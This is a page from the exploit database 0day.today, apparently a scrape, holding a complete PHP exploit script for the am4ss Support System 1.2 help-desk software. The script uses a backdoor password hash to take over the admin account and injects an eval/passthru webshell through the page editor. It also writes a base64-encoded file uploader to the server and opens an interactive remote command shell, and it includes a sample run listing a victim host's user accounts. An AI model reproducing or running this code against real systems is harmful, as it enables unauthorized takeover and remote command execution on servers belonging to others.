0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
am4ss Support System 1.2 PHP Code Injection Exploit
<? /* + Title : Am4ss <= 1.2 , PHP Code Injection | Download : am4ss.com | Tested on: Windows xp sp3 , CentOs | Author : Faris , aka i-Hmx | n0p1337@gmail.com + sec4ever.com , 1337s.cc Time line : > 10/2011 , Vulnerability discovered > till now , i haven't reported the vendor , why!!! The idiot backdoored it by himself + the official site is fucked up ;) > 19/07/2012 , Public Disclosured C:\lab>php am4ss.php localhost /lab/am4ss/ +---------------------------------------+ | Am4SS , PHP Code Injection | | Exploited By i-Hmx | | n0p1337@gmail.com | | sec4ever.com , 1337s.cc | +---------------------------------------+ | Testing Authentication | Injecting our Evil php code | Searching for Injected PageID => 0 => 1 => 2 => 3 => 4 => 5 | Injected ID is 5 | I Have wrriten Tiny uploader at : + localhost/lab/am4ss//am4ss_cache/fa.php + localhost/lab/am4ss//templates/fa.php | sec4ever shell online ;) i-Hmx@localhost# net user User accounts for \\ ------------------------------------------------------------------------------- Administrator ASPNET Guest HelpAssistant IUSR_PHOENIX-XP IWAM_PHOENIX-XP PhoeniX PhoeniX.Limited SUPPORT_388945a0 The command completed with one or more errors. i-Hmx@localhost# exit */ if(!$argv[2]) { echo "\n+ usage : php ".$argv[0]." [Target without http://] /path/\nex : php ".$argv[0]." site.com /support/\n"; exit(); } session_start(); echo "\n+---------------------------------------+\n"; echo "| Am4SS , PHP Code Injection |\n"; echo "| Exploited By i-Hmx |\n"; echo "| n0p1337@gmail.com |\n"; echo "| sec4ever.com , 1337s.cc |\n"; echo "+---------------------------------------+\n"; $host=$argv[1]; $_SESSION['host']=$host; $path=$argv[2]; $vic=$host.$path; function kastr($string, $start, $end){ $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } function get($url,$post,$cookies){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,"http://".$url); curl_setopt($curl, CURLOPT_POSTFIELDS,$post); curl_setopt($curl,CURLOPT_COOKIE,$cookies); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } /* Enabling the Dirty Backdoor */ $ok=kastr($vic,"http://","//"); if (!eregi($host,urlencode(get($vic."/libs/internals/core.assign_by_ref.php?password=ef211a58a6a04914923a7bf23a9a7f0c&username=%C7%E1%D4%D1%DE%C7%E6%ED&country=%C7%E1%E3%DB%D1%C8",'','')))) { die("+ Exploitation Failed :("); } /* authenticating using the updated admin data */ echo "| Testing Authentication\n"; if(!eregi('<td class="tfoot" align="middle" colSpan="2">',get($vic."/admincp/settings.php","",'Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c'))) { /* login may failed due to bad connection , admincp path error , admin firewall . . . etc any way u can use the following data to login manually */ echo "| Authentication Failed\n| Try to login manually using :\n + User : alert@am4ss.com\n + Password : kawkawa\n | auth cookies : \n + Am4sS_CPCHERKAOUI_UserEmail : alert@am4ss.com\n + Am4sS_CPCHERKAOUI_PassWord : ef211a58a6a04914923a7bf23a9a7f0c \n+ Exiting \n"; die(); } /* Creating new page to inject our evil php code */ $facode='echo "<pre>Faris on the mic ;)<br>";@eval(base64_decode($_REQUEST[fa]));echo "faris>>>";passthru(base64_decode($_SERVER[HTTP_CMD]));echo "<<<faris";'; echo "| Injecting our Evil php code\n"; get($vic."/admincp/pages.php?do=add",'do=save&title=farsawy&codetype=2&code='.$facode.'','Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c'); echo "| Searching for Injected PageID\n"; /* Trying to get the ijected pageid via testing 100 pages i don't think it will exceed 10 pages after all :) if this failed , retry exploitation and it will work as hell */ for($f=0;$f<100;$f++) { $mypage=get($vic."/pages.php?pageid=$f","",""); echo " => $f\n"; if(eregi(">>>",$mypage)) { $_SESSION['id']=$f; break; } } $myid=$_SESSION['id']; echo "| Injected ID is $myid\n"; /* Injecting tinni file uploader at the cache and the templates directories these usually chmoded to 777 by the admin */ get($vic."pages.php?pageid=$myid&fa=JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmID0gZm9wZW4oImFtNHNzX2NhY2hlL2ZhLnBocCIsInciKTsKJHQgPSBmb3BlbigidGVtcGxhdGVzL2ZhLnBocCIsInciKTsKZndyaXRlKCRmLCRjb2RlKTsKZndyaXRlKCR0LCRjb2RlKTs=","",""); echo "| I Have wrriten Tiny uploader at :\n + $vic/am4ss_cache/fa.php\n + $vic/templates/fa.php\n"; /* printing sec4ever1337s via passthru() to check if it's enabled or not */ if (!eregi("sec4ever1337s",get($vic."/pages.php?pageid=$f&fa=cGFzc3RocnUoJ2VjaG8gc2VjNGV2ZXIxMzM3cycpOw==","",""))) { echo "| passthru is disabled \n"; echo "| You can evaluate Your code at:\n $vic/pages.php?pageid=$myid&fa=base64_encode(eval code)\n"; exit('+ Exiting'); } echo "| sec4ever shell online ;)\n"; /* if passthru() is enabled , then get small command executer using Egix fsock method to send and retrieve data */ function http_send($host, $packet) { $sock = fsockopen($host, 80); fputs($sock, $packet); return stream_get_contents($sock); } $packet = "GET /{$path}/pages.php?pageid=$myid HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\ni-Hmx@".$_SESSION['host']."# "; if (($fa = trim(fgets(STDIN))) == "exit") exit("\n+ Exiting"); $response = http_send($host, sprintf($packet, base64_encode($fa))); $final=kastr($response,"faris>>>","<<<faris"); echo $final; } /* woooooow , that really fucked my mind But it was funny :D Greets to all sec4ever members C u Guys in another Bomb ;) */ ?> # 0day.today [2024-09-28] #